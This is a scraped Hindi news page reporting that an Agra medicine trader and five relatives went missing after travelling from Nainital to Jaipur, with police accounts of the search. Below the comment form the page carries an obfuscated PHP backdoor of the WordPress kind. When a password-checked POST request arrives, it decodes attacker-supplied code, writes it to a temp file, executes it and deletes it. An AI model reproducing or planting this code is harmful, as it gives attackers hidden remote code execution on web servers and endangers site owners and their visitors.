नैनीताल घूमने गये थे घर के छह सदस्य, फिर निजी गाड़ी से गए जयपुर और फिर लापता…

Uttarakhand Press News, 09 May 2023: आगरा के ट्रांस यमुना स्थित श्रीनगर कॉलोनी निवासी दवा कारोबारी राजेश शर्मा (50) पत्नी, बेटे, बहू, बेटी और नाती सहित 15 अप्रैल से लापता हैं। परिजन अनहोनी की आशंका से चिंतित हैं। पुलिस का कहना है कि परिवार नैनीताल गया था। 23 अप्रैल को लौटकर आया। फिर निजी गाड़ी से जयपुर चला गया। होटल में रुका। इसके बाद लापता हो गए। पुलिस टीम जयपुर में गई है। तलाश की जा रही है।

मामले में राजेश शर्मा के फिरोजाबाद में रहने वाले भाई रमाकांत शर्मा ने गुमशुदगी दर्ज कराई थी। उन्होंने बताया कि भाई राजेश, पत्नी सीमा शर्मा (45), बेटे अभिषेक (25), पुत्र वधू ऊषा, बेटी काव्या (22) और एक साल के नाती विनायक के साथ नैनीताल गए थे। 23 अप्रैल को बात हुई। उन्होंने बताया कि वह बरेली पहुंच गए हैं, जल्दी घर आ जाएंगे। मगर, सुबह तक नहीं आए। मोबाइल भी स्विच ऑफ हो गए। इस पर पुलिस आयुक्त से शिकायत की। मामले में पुलिस ने जांच की। सोशल मीडिया एकाउंट खंगाले। मगर, भाई और परिवार का पता नहीं चला है। पुलिस आयुक्त डाॅ. प्रीतिंदर सिंह ने बताया कि व्यापारी की तलाश की जा रही है। इसके लिए पुलिस की विशेष टीम को लगाया गया है।

टैक्सी से पहुंचे जयपुर बस स्टैंड:
थाना ट्रांस यमुना के प्रभारी निरीक्षक आनंद प्रकाश ने बताया कि दवा व्यापारी पहले निजी गाड़ी से नैनीताल गए थे। 23 अप्रैल को लौटकर आए। आवास पर अपनी गाड़ी खड़ी की। रात में ही टैक्सी करके जयपुर चले गए। रात तकरीबन 3 बजे बस स्टैंड पर टैक्सी उतर गए। व्यापारी ने एक होटल में दो कमरे लिए। सुबह 11:30 बजे होटल छोड़ दिया। तब से मोबाइल बंद हैं।

..तो नहीं हुआ अपहरण:
पुलिस ने व्यापारी के अपहरण से इन्कार किया है। जांच में पता चला है कि वह अपनी मर्जी से गए हैं। मोबाइल स्विच आफ क्यों हैं? यह नहीं पता चला। होटल से निकलने के बाद कहां गए? इसका पता किया जा रहा है। जयपुर पुलिस की भी मदद ली जा रही है। एक टीम जयपुर गई है। परिवार के लापता होने पर कुछ लोग थाने पहुंचे। उन्होंने व्यापारी को अपना माल दिया था। उन्हें रकम लेनी थी। व्यापारी के लापता होने के पीछे क्या वजह है? यह पता किया जा रहा है।

Read Previous

Nainital: हाई कोर्ट को हल्द्वानी गौलापार में शिफ्ट करने को लेकर अहम बैठक आज..

Read Next

शर्मनाक: 62 वर्षीय अमेरिकी महिला से टूरिस्ट गाइड ने किया दुष्कर्म, फिर किया ब्लैकमेल..

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}